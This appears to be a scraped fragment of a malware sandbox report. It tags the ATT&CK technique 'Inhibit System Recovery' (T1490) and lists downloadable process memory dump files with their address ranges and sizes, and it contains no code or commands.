Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

memory/8-141-0x0000000007920000-0x0000000007986000-memory.dmp

Filesize
408KB

Download
memory/8-144-0x0000000009880000-0x0000000009EFA000-memory.dmp

Filesize
6.5MB

Download
memory/8-145-0x0000000008510000-0x000000000852A000-memory.dmp

Filesize
104KB

Download
memory/8-143-0x0000000000DA0000-0x0000000000DB0000-memory.dmp

Filesize
64KB

Download
memory/8-142-0x0000000008020000-0x000000000803E000-memory.dmp

Filesize
120KB

Download
memory/8-140-0x00000000078B0000-0x0000000007916000-memory.dmp

Filesize
408KB

Download
memory/8-134-0x0000000073C20000-0x00000000743D0000-memory.dmp

Filesize
7.7MB

Download
memory/8-136-0x00000000046A0000-0x00000000046D6000-memory.dmp

Filesize
216KB

Download
memory/8-135-0x0000000000DA0000-0x0000000000DB0000-memory.dmp

Filesize
64KB

Download
memory/8-137-0x0000000007210000-0x0000000007838000-memory.dmp

Filesize
6.2MB

Download
memory/8-138-0x0000000000DA0000-0x0000000000DB0000-memory.dmp

Filesize
64KB

Download
memory/8-139-0x00000000071D0000-0x00000000071F2000-memory.dmp

Filesize
136KB

Download